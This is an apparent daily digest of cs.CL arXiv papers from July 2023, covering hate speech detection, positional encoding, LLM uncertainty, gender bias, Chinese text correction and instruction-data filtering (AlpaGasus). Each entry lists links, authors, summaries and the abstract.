cs.CL - 2023-07-18

Multi-Modal Discussion Transformer: Integrating Text, Images and Graph Transformers to Detect Hate Speech on Social Media

  • paper_url: http://arxiv.org/abs/2307.09312
  • repo_url: https://github.com/liamhebert/multimodaldiscussiontransformer
  • paper_authors: Liam Hebert, Gaurav Sahu, Nanda Kishore Sreenivas, Lukasz Golab, Robin Cohen
  • for: This work develops a multi-modal graph-based transformer model for detecting hate speech in online social networks.
  • methods: The model jointly analyzes text and images, using graph transformers to capture the contextual relationships across the entire discussion surrounding a comment, with interwoven fusion layers combining text and image embeddings.
  • results: The model outperforms text-only baselines on hate speech detection; extensive ablation studies are also reported.
    Abstract We present the Multi-Modal Discussion Transformer (mDT), a novel multi-modal graph-based transformer model for detecting hate speech in online social networks. In contrast to traditional text-only methods, our approach to labelling a comment as hate speech centers around the holistic analysis of text and images. This is done by leveraging graph transformers to capture the contextual relationships in the entire discussion that surrounds a comment, with interwoven fusion layers to combine text and image embeddings instead of processing different modalities separately. We compare the performance of our model to baselines that only process text; we also conduct extensive ablation studies. We conclude with future work for multimodal solutions to deliver social value in online contexts, arguing that capturing a holistic view of a conversation greatly advances the effort to detect anti-social behavior.

Mutual Reinforcement Effects in Japanese Sentence Classification and Named Entity Recognition Tasks

  • paper_url: http://arxiv.org/abs/2307.10291
  • repo_url: None
  • paper_authors: Chengguang Gan, Qinghao Zhang, Tatsunori Mori
  • for: This study investigates the complex interactions between the traditionally segmented subtasks of sentence classification and named entity recognition, and the mutual reinforcement effect between these two information extraction subtasks.
  • methods: The study proposes a Sentence Classification and Named Entity Recognition Multi-task (SCNM) approach that combines Sentence Classification (SC) and Named Entity Recognition (NER), develops a Sentence-to-Label Generation (SLG) framework, and uses a generative model to produce SC labels, NER labels, and the associated text segments.
  • results: In SCNM, SC accuracy improves by 1.13 points and NER by 1.06 points compared to standalone tasks, and the Constraint Mechanism (CM) raises the format accuracy of the generated output. The SLG framework also outperforms the baseline on the standalone SC task and performs better than fine-tuning in few-shot learning experiments.
    Abstract Information extraction(IE) is a crucial subfield within natural language processing. However, for the traditionally segmented approach to sentence classification and Named Entity Recognition, the intricate interactions between these individual subtasks remain largely uninvestigated. In this study, we propose an integrative analysis, converging sentence classification with Named Entity Recognition, with the objective to unveil and comprehend the mutual reinforcement effect within these two information extraction subtasks. To achieve this, we introduce a Sentence Classification and Named Entity Recognition Multi-task (SCNM) approach that combines Sentence Classification (SC) and Named Entity Recognition (NER). We develop a Sentence-to-Label Generation (SLG) framework for SCNM and construct a Wikipedia dataset containing both SC and NER. Using a format converter, we unify input formats and employ a generative model to generate SC-labels, NER-labels, and associated text segments. We propose a Constraint Mechanism (CM) to improve generated format accuracy. Our results show SC accuracy increased by 1.13 points and NER by 1.06 points in SCNM compared to standalone tasks, with CM raising format accuracy from 63.61 to 100. The findings indicate mutual reinforcement effects between SC and NER, and integration enhances both tasks' performance. We additionally implemented the SLG framework on single SC task. It yielded superior accuracies compared to the baseline on two distinct Japanese SC datasets. Notably, in the experiment of few-shot learning, SLG framework shows much better performance than fine-tune method. These empirical findings contribute additional evidence to affirm the efficacy of the SLG framework.

Linearized Relative Positional Encoding

  • paper_url: http://arxiv.org/abs/2307.09270
  • repo_url: https://github.com/aliutkus/spe
  • paper_authors: Zhen Qin, Weixuan Sun, Kaiyue Lu, Hui Deng, Dongxu Li, Xiaodong Han, Yuchao Dai, Lingpeng Kong, Yiran Zhong
  • for: This paper studies design principles for relative positional encoding methods in linear transformers.
  • methods: The paper unifies a variety of existing linear relative positional encoding approaches under a canonical form and proposes a family of linear relative positional encoding algorithms via unitary transformation.
  • results: LRPE achieves state-of-the-art performance in language modeling, text classification, and image classification, and the framework can be used to derive further relative positional encoding methods.
    Abstract Relative positional encoding is widely used in vanilla and linear transformers to represent positional information. However, existing encoding methods of a vanilla transformer are not always directly applicable to a linear transformer, because the latter requires a decomposition of the query and key representations into separate kernel functions. Nevertheless, principles for designing encoding methods suitable for linear transformers remain understudied. In this work, we put together a variety of existing linear relative positional encoding approaches under a canonical form and further propose a family of linear relative positional encoding algorithms via unitary transformation. Our formulation leads to a principled framework that can be used to develop new relative positional encoding methods that preserve linear space-time complexity. Equipped with different models, the proposed linearized relative positional encoding (LRPE) family derives effective encoding for various applications. Experiments show that compared with existing methods, LRPE achieves state-of-the-art performance in language modeling, text classification, and image classification. Meanwhile, it emphasizes a general paradigm for designing broadly more relative positional encoding methods that are applicable to linear transformers. The code is available at https://github.com/OpenNLPLab/Lrpe.

Text vectorization via transformer-based language models and n-gram perplexities

  • paper_url: http://arxiv.org/abs/2307.09255
  • repo_url: None
  • paper_authors: Mihailo Škorić
  • for: This paper aims to address the limitations of using scalar perplexity as a measure of text quality, and instead proposes a new method based on vector values that take into account the probability distribution of individual tokens within the input.
  • methods: The proposed method uses n-gram perplexities to calculate the relative perplexity of each text token, and combines these values into a single vector representing the input. This approach allows for a more nuanced assessment of text quality, taking into account the probability distribution of individual tokens as well as their overall probability.
  • results: The authors evaluate the effectiveness of their proposed method using several experiments, and show that it outperforms traditional scalar perplexity measures in terms of accurately assessing text quality. They also demonstrate the applicability of their method to a variety of natural language processing tasks, including language modeling and text classification.
    Abstract As the probability (and thus perplexity) of a text is calculated based on the product of the probabilities of individual tokens, it may happen that one unlikely token significantly reduces the probability (i.e., increases the perplexity) of some otherwise highly probable input, while potentially representing a simple typographical error. Also, given that perplexity is a scalar value that refers to the entire input, information about the probability distribution within it is lost in the calculation (a relatively good text that has one unlikely token and another text in which each token is equally likely can have the same perplexity value), especially for longer texts. As an alternative to scalar perplexity this research proposes a simple algorithm used to calculate vector values based on n-gram perplexities within the input. Such representations consider the previously mentioned aspects, and instead of a unique value, the relative perplexity of each text token is calculated, and these values are combined into a single vector representing the input.
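To make the vector-perplexity idea concrete, below is a minimal sketch that assigns each token (after the first) its own n-gram perplexity and returns the resulting vector instead of a single scalar. The bigram order, the add-one smoothing, and the use of token-level perplexities 1/P(token | previous) are illustrative assumptions; the paper's exact n-gram configuration and combination rule may differ.

```python
from collections import Counter

def train_bigram(corpus_tokens):
    """Toy add-one-smoothed bigram model."""
    unigrams = Counter(corpus_tokens)
    bigrams = Counter(zip(corpus_tokens, corpus_tokens[1:]))
    vocab_size = len(unigrams)

    def prob(prev, tok):
        return (bigrams[(prev, tok)] + 1) / (unigrams[prev] + vocab_size)

    return prob

def perplexity_vector(tokens, prob):
    # One entry per token after the first: the token-level perplexity
    # 1 / P(token | previous token), kept as a vector rather than averaged.
    return [1.0 / prob(prev, tok) for prev, tok in zip(tokens, tokens[1:])]

corpus = "the cat sat on the mat and the cat ate".split()
prob = train_bigram(corpus)
print(perplexity_vector("the cat sat on the mat".split(), prob))
```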

PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models

  • paper_url: http://arxiv.org/abs/2307.09254
  • repo_url: None
  • paper_authors: Sangdon Park, Taesoo Kim
  • for: The study aims to improve model trustworthiness through uncertainty learning and quantification.
  • methods: The study proposes prediction set models parameterized by neural networks that quantify the uncertainty of generative language models (GLMs) more precisely while still satisfying a probably approximately correct (PAC) guarantee.
  • results: Across four types of language datasets and six types of models, the method improves the quantified uncertainty by 63% on average compared to a standard baseline method.
    Abstract Uncertainty learning and quantification of models are crucial tasks to enhance the trustworthiness of the models. Importantly, the recent surge of generative language models (GLMs) emphasizes the need for reliable uncertainty quantification due to the concerns on generating hallucinated facts. In this paper, we propose to learn neural prediction set models that comes with the probably approximately correct (PAC) guarantee for quantifying the uncertainty of GLMs. Unlike existing prediction set models, which are parameterized by a scalar value, we propose to parameterize prediction sets via neural networks, which achieves more precise uncertainty quantification but still satisfies the PAC guarantee. We demonstrate the efficacy of our method on four types of language datasets and six types of models by showing that our method improves the quantified uncertainty by $63\%$ on average, compared to a standard baseline method.

Unveiling Gender Bias in Terms of Profession Across LLMs: Analyzing and Addressing Sociological Implications

  • paper_url: http://arxiv.org/abs/2307.09162
  • repo_url: None
  • paper_authors: Vishesh Thakur
  • for: The study analyzes gender bias in Large Language Models (LLMs), focusing on comparisons between GPT-2 and GPT-3.5, two prominent language models, to better understand its implications.
  • methods: The study uses a literature review, data collection and preprocessing, and in-depth quantitative analysis to evaluate gender bias in the LLMs.
  • results: The study identifies gendered word associations, language usage, and biased narratives in the outputs of these LLMs, and discusses the ethical implications and potential societal consequences, particularly for marginalized communities.
    Abstract Gender bias in artificial intelligence (AI) and natural language processing has garnered significant attention due to its potential impact on societal perceptions and biases. This research paper aims to analyze gender bias in Large Language Models (LLMs) with a focus on multiple comparisons between GPT-2 and GPT-3.5, some prominent language models, to better understand its implications. Through a comprehensive literature review, the study examines existing research on gender bias in AI language models and identifies gaps in the current knowledge. The methodology involves collecting and preprocessing data from GPT-2 and GPT-3.5, and employing in-depth quantitative analysis techniques to evaluate gender bias in the generated text. The findings shed light on gendered word associations, language usage, and biased narratives present in the outputs of these Large Language Models. The discussion explores the ethical implications of gender bias and its potential consequences on social perceptions and marginalized communities. Additionally, the paper presents strategies for reducing gender bias in LLMs, including algorithmic approaches and data augmentation techniques. The research highlights the importance of interdisciplinary collaborations and the role of sociological studies in mitigating gender bias in AI models. By addressing these issues, we can pave the way for more inclusive and unbiased AI systems that have a positive impact on society.

Attention over pre-trained Sentence Embeddings for Long Document Classification

  • paper_url: http://arxiv.org/abs/2307.09084
  • repo_url: None
  • paper_authors: Amine Abdaoui, Sourav Dutta
  • for: The study aims to improve transformer performance on long documents, addressing the quadratic attention complexity of transformers over long sequences.
  • methods: The approach starts from semantically meaningful embeddings produced by pre-trained sentence transformers and combines them with a small attention layer whose cost scales linearly with the document length.
  • results: On three standard document classification datasets, the method is competitive with state-of-the-art models that use standard fine-tuning, and obtains better results when the underlying transformers are frozen.
    Abstract Despite being the current de-facto models in most NLP tasks, transformers are often limited to short sequences due to their quadratic attention complexity on the number of tokens. Several attempts to address this issue were studied, either by reducing the cost of the self-attention computation or by modeling smaller sequences and combining them through a recurrence mechanism or using a new transformer model. In this paper, we suggest to take advantage of pre-trained sentence transformers to start from semantically meaningful embeddings of the individual sentences, and then combine them through a small attention layer that scales linearly with the document length. We report the results obtained by this simple architecture on three standard document classification datasets. When compared with the current state-of-the-art models using standard fine-tuning, the studied method obtains competitive results (even if there is no clear best model in this configuration). We also showcase that the studied architecture obtains better results when freezing the underlying transformers. A configuration that is useful when we need to avoid complete fine-tuning (e.g. when the same frozen transformer is shared by different applications). Finally, two additional experiments are provided to further evaluate the relevancy of the studied architecture over simpler baselines.
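As an illustration of the architecture described above, here is a minimal sketch of a classifier that attends over pre-computed sentence embeddings with a single learned query, so the attention cost grows linearly with the number of sentences. The learned-query pooling layer and the embedding dimension are illustrative assumptions, not the paper's exact layer.

```python
import torch
import torch.nn as nn

class SentenceAttentionClassifier(nn.Module):
    def __init__(self, emb_dim: int, num_classes: int):
        super().__init__()
        self.query = nn.Parameter(torch.randn(emb_dim))   # single learned query
        self.classifier = nn.Linear(emb_dim, num_classes)

    def forward(self, sent_embs: torch.Tensor) -> torch.Tensor:
        # sent_embs: (num_sentences, emb_dim), e.g. produced by a frozen
        # pre-trained sentence transformer. One dot product per sentence,
        # so the cost is linear in document length.
        scores = sent_embs @ self.query                    # (num_sentences,)
        weights = torch.softmax(scores, dim=0)             # attention weights
        doc_emb = weights @ sent_embs                      # (emb_dim,)
        return self.classifier(doc_emb)

model = SentenceAttentionClassifier(emb_dim=384, num_classes=3)
doc = torch.randn(12, 384)   # 12 sentence embeddings of one long document
logits = model(doc)
```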

Towards a Neural Era in Dialogue Management for Collaboration: A Literature Survey

  • paper_url: http://arxiv.org/abs/2307.09021
  • repo_url: None
  • paper_authors: Amogh Mannekote
  • for: The survey examines dialogue management for collaborative dialogue systems, which underpin human-AI collaboration in problem-solving, creative exploration, and social support.
  • methods: It first reviews the evolution of dialogue management paradigms in collaborative dialogue systems, from traditional handcrafted and information-state based methods to AI planning-inspired approaches, and then turns to contemporary data-driven dialogue management techniques that transfer deep learning successes to collaborative settings.
  • results: The survey analyzes a selected set of recent neural approaches to collaborative dialogue management and highlights prevailing trends, providing foundational background for future work as the dialogue systems community embraces large language models.
    Abstract Dialogue-based human-AI collaboration can revolutionize collaborative problem-solving, creative exploration, and social support. To realize this goal, the development of automated agents proficient in skills such as negotiating, following instructions, establishing common ground, and progressing shared tasks is essential. This survey begins by reviewing the evolution of dialogue management paradigms in collaborative dialogue systems, from traditional handcrafted and information-state based methods to AI planning-inspired approaches. It then shifts focus to contemporary data-driven dialogue management techniques, which seek to transfer deep learning successes from form-filling and open-domain settings to collaborative contexts. The paper proceeds to analyze a selected set of recent works that apply neural approaches to collaborative dialogue management, spotlighting prevailing trends in the field. This survey hopes to provide foundational background for future advancements in collaborative dialogue management, particularly as the dialogue systems community continues to embrace the potential of large language models.

On the (In)Effectiveness of Large Language Models for Chinese Text Correction

  • paper_url: http://arxiv.org/abs/2307.09007
  • repo_url: None
  • paper_authors: Yinghui Li, Haojing Huang, Shirong Ma, Yong Jiang, Yangning Li, Feng Zhou, Hai-Tao Zheng, Qingyu Zhou
  • for: The paper studies how ChatGPT performs on Chinese natural language processing tasks, specifically the two Chinese Text Correction scenarios of grammatical error correction and spelling check.
  • methods: ChatGPT is evaluated on the Chinese Grammatical Error Correction (CGEC) and Chinese Spelling Check (CSC) tasks and compared with previous state-of-the-art fine-tuned models.
  • results: ChatGPT exhibits both impressive performance and unsatisfactory behavior on the two Chinese Text Correction scenarios.
    Abstract Recently, the development and progress of Large Language Models (LLMs) have amazed the entire Artificial Intelligence community. As an outstanding representative of LLMs and the foundation model that set off this wave of research on LLMs, ChatGPT has attracted more and more researchers to study its capabilities and performance on various downstream Natural Language Processing (NLP) tasks. While marveling at ChatGPT's incredible performance on kinds of tasks, we notice that ChatGPT also has excellent multilingual processing capabilities, such as Chinese. To explore the Chinese processing ability of ChatGPT, we focus on Chinese Text Correction, a fundamental and challenging Chinese NLP task. Specifically, we evaluate ChatGPT on the Chinese Grammatical Error Correction (CGEC) and Chinese Spelling Check (CSC) tasks, which are two main Chinese Text Correction scenarios. From extensive analyses and comparisons with previous state-of-the-art fine-tuned models, we empirically find that the ChatGPT currently has both amazing performance and unsatisfactory behavior for Chinese Text Correction. We believe our findings will promote the landing and application of LLMs in the Chinese NLP community.

Zero-shot Domain-sensitive Speech Recognition with Prompt-conditioning Fine-tuning

  • paper_url: http://arxiv.org/abs/2307.10274
  • repo_url: https://github.com/mtkresearch/clairaudience
  • paper_authors: Feng-Ting Liao, Yung-Chieh Chan, Yi-Chang Chen, Chan-Jan Hsu, Da-shan Shiu
  • for: The paper aims to create domain-sensitive speech recognition models that incorporate textual domain information by conditioning generation on a given text prompt.
  • methods: A pre-trained end-to-end model (Whisper) is fine-tuned to learn from demonstrations with prompt examples; the method is further extended to text-only fine-tuning to achieve domain sensitivity and domain adaptation.
  • results: The model achieves Word Error Rate (WER) reductions of up to 33% on unseen datasets from various domains and prompt contexts, and the text-only fine-tuned model reaches a WER reduction of up to 29% on the medical conversation dataset.
    Abstract In this work, we propose a method to create domain-sensitive speech recognition models that utilize textual domain information by conditioning its generation on a given text prompt. This is accomplished by fine-tuning a pre-trained, end-to-end model (Whisper) to learn from demonstrations with prompt examples. We show that this ability can be generalized to different domains and even various prompt contexts, with our model gaining a Word Error Rate (WER) reduction of up to 33% on unseen datasets from various domains, such as medical conversation, air traffic control communication, and financial meetings. Considering the limited availability of audio-transcript pair data, we further extend our method to text-only fine-tuning to achieve domain sensitivity as well as domain adaptation. We demonstrate that our text-only fine-tuned model can also attend to various prompt contexts, with the model reaching the most WER reduction of 29% on the medical conversation dataset.

AutoAlign: Fully Automatic and Effective Knowledge Graph Alignment enabled by Large Language Models

  • paper_url: http://arxiv.org/abs/2307.11772
  • repo_url: None
  • paper_authors: Rui Zhang, Yixin Su, Bayu Distiawan Trisedya, Xiaoyan Zhao, Min Yang, Hong Cheng, Jianzhong Qi
  • for: automatic entity alignment between knowledge graphs (KGs)
  • methods: constructs a predicate-proximity-graph with the help of large language models, computes entity embeddings using TransE, and shifts the two KGs’ entity embeddings into the same vector space based on attribute similarity
  • results: improves the performance of entity alignment significantly compared to state-of-the-art methods
    Abstract The task of entity alignment between knowledge graphs (KGs) aims to identify every pair of entities from two different KGs that represent the same entity. Many machine learning-based methods have been proposed for this task. However, to our best knowledge, existing methods all require manually crafted seed alignments, which are expensive to obtain. In this paper, we propose the first fully automatic alignment method named AutoAlign, which does not require any manually crafted seed alignments. Specifically, for predicate embeddings, AutoAlign constructs a predicate-proximity-graph with the help of large language models to automatically capture the similarity between predicates across two KGs. For entity embeddings, AutoAlign first computes the entity embeddings of each KG independently using TransE, and then shifts the two KGs' entity embeddings into the same vector space by computing the similarity between entities based on their attributes. Thus, both predicate alignment and entity alignment can be done without manually crafted seed alignments. AutoAlign is not only fully automatic, but also highly effective. Experiments using real-world KGs show that AutoAlign improves the performance of entity alignment significantly compared to state-of-the-art methods.
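Since the abstract names TransE for the per-KG entity embeddings, here is a minimal sketch of that component (the translational scoring and a margin loss). The dimensions, margin, and negative-sampling details are illustrative assumptions, and AutoAlign's predicate-proximity-graph and attribute-based embedding shift are not shown.

```python
import torch
import torch.nn as nn

class TransE(nn.Module):
    def __init__(self, n_entities: int, n_relations: int, dim: int = 64):
        super().__init__()
        self.ent = nn.Embedding(n_entities, dim)
        self.rel = nn.Embedding(n_relations, dim)

    def score(self, h, r, t):
        # TransE distance: smaller means the triple (h, r, t) is more plausible.
        return (self.ent(h) + self.rel(r) - self.ent(t)).norm(p=2, dim=-1)

def margin_loss(model, pos, neg, margin=1.0):
    # Push plausible triples to score lower than corrupted ones by a margin.
    return torch.relu(margin + model.score(*pos) - model.score(*neg)).mean()

model = TransE(n_entities=1000, n_relations=50)
pos = (torch.tensor([3]), torch.tensor([7]), torch.tensor([42]))
neg = (torch.tensor([3]), torch.tensor([7]), torch.tensor([999]))   # corrupted tail
loss = margin_loss(model, pos, neg)
```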

Mitigating Label Bias via Decoupled Confident Learning

  • paper_url: http://arxiv.org/abs/2307.08945
  • repo_url: None
  • paper_authors: Yunyi Li, Maria De-Arteaga, Maytal Saar-Tsechansky
  • for: Mitigating algorithmic bias and addressing label bias in training data.
  • methods: Decoupled Confident Learning (DeCoLe) pruning method to identify and remove biased labels.
  • results: Successfully identified biased labels and outperformed competing approaches in the context of hate speech detection.
    Abstract Growing concerns regarding algorithmic fairness have led to a surge in methodologies to mitigate algorithmic bias. However, such methodologies largely assume that observed labels in training data are correct. This is problematic because bias in labels is pervasive across important domains, including healthcare, hiring, and content moderation. In particular, human-generated labels are prone to encoding societal biases. While the presence of labeling bias has been discussed conceptually, there is a lack of methodologies to address this problem. We propose a pruning method -- Decoupled Confident Learning (DeCoLe) -- specifically designed to mitigate label bias. After illustrating its performance on a synthetic dataset, we apply DeCoLe in the context of hate speech detection, where label bias has been recognized as an important challenge, and show that it successfully identifies biased labels and outperforms competing approaches.
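For context, below is a minimal sketch of confident-learning-style pruning, the general idea DeCoLe builds on: keep only examples whose out-of-sample predicted probability for their observed label clears a class-conditional confidence threshold. The thresholding rule shown is the generic one; the paper's "decoupled" procedure (e.g., group-specific models or thresholds) is not reproduced.

```python
import numpy as np

def prune_suspected_label_errors(pred_probs, labels):
    """pred_probs: (n, k) out-of-sample predicted probabilities;
    labels: (n,) observed (possibly biased) labels.
    Returns a boolean mask of examples whose labels look trustworthy."""
    n, k = pred_probs.shape
    labels = np.asarray(labels)
    # Class-conditional thresholds: mean self-confidence of each observed class.
    thresholds = np.array([
        pred_probs[labels == c, c].mean() if np.any(labels == c) else 1.0
        for c in range(k)
    ])
    return pred_probs[np.arange(n), labels] >= thresholds[labels]

probs = np.array([[0.9, 0.1], [0.2, 0.8], [0.6, 0.4]])
labels = np.array([0, 0, 1])   # the second example's label disagrees with the model
print(prune_suspected_label_errors(probs, labels))
```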

NTK-approximating MLP Fusion for Efficient Language Model Fine-tuning

  • paper_url: http://arxiv.org/abs/2307.08941
  • repo_url: https://github.com/weitianxin/mlp_fusion
  • paper_authors: Tianxin Wei, Zeming Guo, Yifan Chen, Jingrui He
  • for: The paper aims to make fine-tuning of pre-trained language models (PLMs) more efficient by compressing their multilayer perceptron (MLP) modules into lightweight ones, reducing the required computation and memory without sacrificing performance.
  • methods: Building on the neural tangent kernel (NTK), the MLP is reconsidered as a bundle of sub-MLPs that are clustered into a given number of centroids; the centroids are then restored as a compressed MLP that is shown to approximate the NTK of the original PLM.
  • results: Experiments on natural language understanding (NLU) and generation (NLG) tasks verify the effectiveness of the proposed MLP fusion for PLM fine-tuning.
    Abstract Fine-tuning a pre-trained language model (PLM) emerges as the predominant strategy in many natural language processing applications. However, even fine-tuning the PLMs and doing inference are expensive, especially on edge devices with low computing power. Some general approaches (e.g. quantization and distillation) have been widely studied to reduce the compute/memory of PLM fine-tuning, while very few one-shot compression techniques are explored. In this paper, we investigate the neural tangent kernel (NTK)--which reveals the gradient descent dynamics of neural networks--of the multilayer perceptrons (MLP) modules in a PLM and propose to coin a lightweight PLM through NTK-approximating MLP fusion. To achieve this, we reconsider the MLP as a bundle of sub-MLPs, and cluster them into a given number of centroids, which can then be restored as a compressed MLP and surprisingly shown to well approximate the NTK of the original PLM. Extensive experiments of PLM fine-tuning on both natural language understanding (NLU) and generation (NLG) tasks are provided to verify the effectiveness of the proposed method MLP fusion. Our code is available at https://github.com/weitianxin/MLP_Fusion.
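A rough sketch of the "cluster sub-MLPs into centroids" step for a single two-layer MLP block is given below. Treating each hidden unit as a sub-MLP, clustering the concatenation of its input and output weights with k-means, and summing output weights within a cluster are illustrative assumptions; the paper's NTK-guided fusion and reconstruction details may differ.

```python
import numpy as np
from sklearn.cluster import KMeans

def fuse_mlp(W1, b1, W2, n_centroids):
    """W1: (h, d_in), b1: (h,), W2: (d_out, h); each hidden unit i is a sub-MLP."""
    feats = np.concatenate([W1, b1[:, None], W2.T], axis=1)   # (h, d_in + 1 + d_out)
    km = KMeans(n_clusters=n_centroids, n_init=10).fit(feats)
    W1_c = np.zeros((n_centroids, W1.shape[1]))
    b1_c = np.zeros(n_centroids)
    W2_c = np.zeros((W2.shape[0], n_centroids))
    for c in range(n_centroids):
        idx = np.where(km.labels_ == c)[0]
        W1_c[c] = W1[idx].mean(axis=0)
        b1_c[c] = b1[idx].mean()
        W2_c[:, c] = W2[:, idx].sum(axis=1)   # sum keeps the layer's output scale
    return W1_c, b1_c, W2_c

W1c, b1c, W2c = fuse_mlp(np.random.randn(128, 64), np.random.randn(128),
                         np.random.randn(64, 128), n_centroids=16)
```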

Teach model to answer questions after comprehending the document

  • paper_url: http://arxiv.org/abs/2307.08931
  • repo_url: None
  • paper_authors: Ruiqing Sun, Ping Jian
  • for: To improve performance on multi-choice machine reading comprehension (MRC) by teaching the model to comprehend the document rather than only generate the answer.
  • methods: A two-stage knowledge distillation method is proposed that divides the MRC task into two separate stages so the model better comprehends the document.
  • results: Experimental results show that the student model equipped with this method achieves significant improvements on the MRC task, demonstrating the effectiveness of the method.
    Abstract Multi-choice Machine Reading Comprehension (MRC) is a challenging extension of Natural Language Processing (NLP) that requires the ability to comprehend the semantics and logical relationships between entities in a given text. The MRC task has traditionally been viewed as a process of answering questions based on the given text. This single-stage approach has often led the network to concentrate on generating the correct answer, potentially neglecting the comprehension of the text itself. As a result, many prevalent models have faced challenges in performing well on this task when dealing with longer texts. In this paper, we propose a two-stage knowledge distillation method that teaches the model to better comprehend the document by dividing the MRC task into two separate stages. Our experimental results show that the student model, when equipped with our method, achieves significant improvements, demonstrating the effectiveness of our method.

Large Language Models Perform Diagnostic Reasoning

  • paper_url: http://arxiv.org/abs/2307.08922
  • repo_url: https://github.com/nlplab-best-team/diagnostic-reasoning
  • paper_authors: Cheng-Kuang Wu, Wei-Lin Chen, Hsin-Hsi Chen
  • for: The paper explores extending chain-of-thought (CoT) prompting to medical reasoning for the task of automatic diagnosis.
  • methods: Motivated by doctors' underlying reasoning process, the paper proposes Diagnostic-Reasoning Chain-of-Thought (DR-CoT) prompting.
  • results: Prompting large language models trained only on a general text corpus with two DR-CoT exemplars improves diagnostic accuracy by 15% over standard prompting, and the gap reaches 18% in out-domain settings, suggesting that expert-knowledge reasoning can be elicited through proper prompting.
    Abstract We explore the extension of chain-of-thought (CoT) prompting to medical reasoning for the task of automatic diagnosis. Motivated by doctors' underlying reasoning process, we present Diagnostic-Reasoning CoT (DR-CoT). Empirical results demonstrate that by simply prompting large language models trained only on general text corpus with two DR-CoT exemplars, the diagnostic accuracy improves by 15% comparing to standard prompting. Moreover, the gap reaches a pronounced 18% in out-domain settings. Our findings suggest expert-knowledge reasoning in large language models can be elicited through proper promptings.
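To illustrate the prompting pattern (not the paper's actual exemplars), a hypothetical DR-CoT-style prompt might interleave a diagnostic-reasoning step between the patient description and the diagnosis, as in the sketch below; the exemplar text and formatting are invented for illustration.

```python
DR_COT_EXEMPLAR = """Patient: I have had a fever, dry cough, and loss of smell for three days.
Diagnostic reasoning: Fever with a dry cough points to a respiratory infection;
the loss of smell narrows the differential toward a viral cause such as COVID-19.
Diagnosis: Suspected COVID-19."""

def build_prompt(exemplars, new_case):
    # Few-shot prompt: exemplars first, then the new case ending at the
    # "Diagnostic reasoning:" cue so the model continues with its reasoning.
    return "\n\n".join(exemplars) + f"\n\nPatient: {new_case}\nDiagnostic reasoning:"

prompt = build_prompt([DR_COT_EXEMPLAR],
                      "Severe headache, stiff neck, and light sensitivity since yesterday.")
print(prompt)
```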

An Integrated NPL Approach to Sentiment Analysis in Satisfaction Surveys

  • paper_url: http://arxiv.org/abs/2307.11771
  • repo_url: None
  • paper_authors: Edson B. Pinto-Luque
  • for: The paper aims to apply an integrated approach to natural language processing (NLP) to satisfaction surveys in order to understand and extract relevant information from survey responses, analyze feelings, and identify recurring word patterns.
  • methods: The paper uses NLP techniques such as emotional polarity detection, classification of responses into positive, negative, or neutral categories, and opinion mining to highlight participants' opinions, together with an analysis of word patterns in satisfaction survey responses.
  • results: The results can be used to identify areas for improvement, understand respondents' preferences, and make strategic decisions based on the analysis to improve respondent satisfaction, providing a deeper understanding of feelings, opinions, and the themes and trends present in responses.
    Abstract The research project aims to apply an integrated approach to natural language processing (NLP) to satisfaction surveys. It will focus on understanding and extracting relevant information from survey responses, analyzing feelings, and identifying recurring word patterns. NLP techniques will be used to determine emotional polarity, classify responses into positive, negative, or neutral categories, and use opinion mining to highlight participants' opinions. This approach will help identify the most relevant aspects for participants and understand their opinions in relation to those specific aspects. A key component of the research project will be the analysis of word patterns in satisfaction survey responses using NLP. This analysis will provide a deeper understanding of the feelings, opinions, themes, and trends present in respondents' responses. The results obtained from this approach can be used to identify areas for improvement, understand respondents' preferences, and make strategic decisions based on the analysis to improve respondent satisfaction.

Comparative Performance Evaluation of Large Language Models for Extracting Molecular Interactions and Pathway Knowledge

  • paper_url: http://arxiv.org/abs/2307.08813
  • repo_url: https://github.com/boxorange/bioie-llm
  • paper_authors: Gilchan Park, Byung-Jun Yoon, Xihaier Luo, Vanessa López-Marrero, Patrick Johnstone, Shinjae Yoo, Francis J. Alexander
  • for: The study explores using large language models to extract protein interaction and pathway knowledge from the scientific literature, addressing the incompleteness and labor-intensive maintenance of existing curated databases.
  • methods: Different large language models are evaluated on tasks involving the recognition of protein interactions, pathways, and gene regulatory relations.
  • results: The performance of the various models on these tasks is thoroughly evaluated and compared, and both future opportunities and remaining challenges of the approach are discussed; code and data are released.
    Abstract Understanding protein interactions and pathway knowledge is crucial for unraveling the complexities of living systems and investigating the underlying mechanisms of biological functions and complex diseases. While existing databases provide curated biological data from literature and other sources, they are often incomplete and their maintenance is labor-intensive, necessitating alternative approaches. In this study, we propose to harness the capabilities of large language models to address these issues by automatically extracting such knowledge from the relevant scientific literature. Toward this goal, in this work, we investigate the effectiveness of different large language models in tasks that involve recognizing protein interactions, pathways, and gene regulatory relations. We thoroughly evaluate the performance of various models, highlight the significant findings, and discuss both the future opportunities and the remaining challenges associated with this approach. The code and data are available at: https://github.com/boxorange/BioIE-LLM

AlpaGasus: Training A Better Alpaca with Fewer Data

  • paper_url: http://arxiv.org/abs/2307.08701
  • repo_url: None
  • paper_authors: Lichang Chen, Shiyang Li, Jun Yan, Hai Wang, Kalpa Gunaratna, Vikas Yadav, Zheng Tang, Vijay Srinivasan, Tianyi Zhou, Heng Huang, Hongxia Jin
  • for: The paper proposes a simple and effective data selection strategy to improve the performance of large language models (LLMs) during instruction-finetuning (IFT).
  • methods: The strategy uses a strong language model (e.g., ChatGPT) to automatically identify and remove low-quality data from the IFT dataset.
  • results: The strategy improves instruction-following capability while substantially reducing training time: AlpaGasus, finetuned on only 9k filtered examples, outperforms the original Alpaca, and its 13B variant matches over 90% of the performance of its teacher model (Text-Davinci-003) on test tasks.
    Abstract Large language models~(LLMs) obtain instruction-following capability through instruction-finetuning (IFT) on supervised instruction/response data. However, widely used IFT datasets (e.g., Alpaca's 52k data) surprisingly contain many low-quality instances with incorrect or irrelevant responses, which are misleading and detrimental to IFT. In this paper, we propose a simple and effective data selection strategy that automatically identifies and removes low-quality data using a strong LLM (e.g., ChatGPT). To this end, we introduce AlpaGasus, which is finetuned on only 9k high-quality data filtered from the 52k Alpaca data. AlpaGasus significantly outperforms the original Alpaca as evaluated by GPT-4 on multiple test sets and its 13B variant matches $>90\%$ performance of its teacher LLM (i.e., Text-Davinci-003) on test tasks. It also provides 5.7x faster training, reducing the training time for a 7B variant from 80 minutes (for Alpaca) to 14 minutes \footnote{We apply IFT for the same number of epochs as Alpaca(7B) but on fewer data, using 4$\times$NVIDIA A100 (80GB) GPUs and following the original Alpaca setting and hyperparameters.}. Overall, AlpaGasus demonstrates a novel data-centric IFT paradigm that can be generally applied to instruction-tuning data, leading to faster training and better instruction-following models. Our project page is available at: 